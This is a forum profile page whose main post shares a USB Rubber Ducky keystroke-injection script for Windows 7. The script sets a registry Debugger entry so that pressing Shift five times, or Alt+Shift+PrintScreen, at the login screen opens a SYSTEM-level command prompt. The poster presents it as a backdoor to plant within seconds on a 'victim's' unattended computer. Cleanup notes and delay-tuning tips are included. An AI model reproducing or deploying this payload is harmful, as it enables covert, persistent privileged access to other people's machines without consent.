Jump to content

fuzzerman

Members
  • Posts

    2
  • Joined

  • Last visited

Everything posted by fuzzerman

  1. is going to bbq a mac motherboard. http://t.co/K54LCvv

  2. Yes, as RUdude says, the victim must have admin privileges. Thanks for pointing that out, I have updated the original post.
  3. I know that if you have physical access to a computer, it's pretty much owned. But the reason I wanted to make a rubber ducky payload of this old backdoor is that you only need a few seconds to install the backdoor. I.e when the victim leaves his/hers computer unattended without putting on screen saver with password, you put in the rubber ducky and install this payload. After this you can a) press the SHIFT key continuously for 5 times or B) Alt+Shift+PrintScreen which will open a command prompt with system privilege. Simple and cool :-) Make sure to take a backup of the original sethc.exe. I have had some encoding issues, be sure to check out which keyboards the rubber ducky firmware supports. I have edited the code without testing it again, but I think it still will compile and run as planned. Tune the delay parameter for your own pc. I have made the delays long enough for you to see what's happening. Enjoy. The victims machine must have admin privileges for this to work. REM Author: Asbjørn Reglund Thorsen <art@awaresec.no> REM Target: Tested on Windows 7 REM Description: Replaces the "Sticky keys" on windows 7s login screen with the "command prompt" executable REM References: http://carnal0wnage....ticky-keys.html REM http://www.redmondpi...n-login-screen/ ESCAPE CONTROL ESCAPE DELAY 400 STRING cmd DELAY 400 MENU DELAY 400 DOWN DELAY 400 DOWN DELAY 1000 ENTER DELAY 1000 LEFT DELAY 1000 ENTER DELAY 1000 STRING REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" STRING /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe" DELAY 400 ENTER REM Notes: REM Thanks to Espen Grøndal who told me about this "feature" REM The trick does not work when the Sticky Keys are disabled. REM If you see the message that says “The operation completed successfully”, that means you have installed the backdoor. REM Cleanup: You can use reg edit and browse to "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\" and remove the sethc.exe file.
  4. The trainer is Joshua "Jabra" Abraham the maker of Fierce (is a network enumeration tool) http://t.co/VMS5F2x

×
×
  • Create New...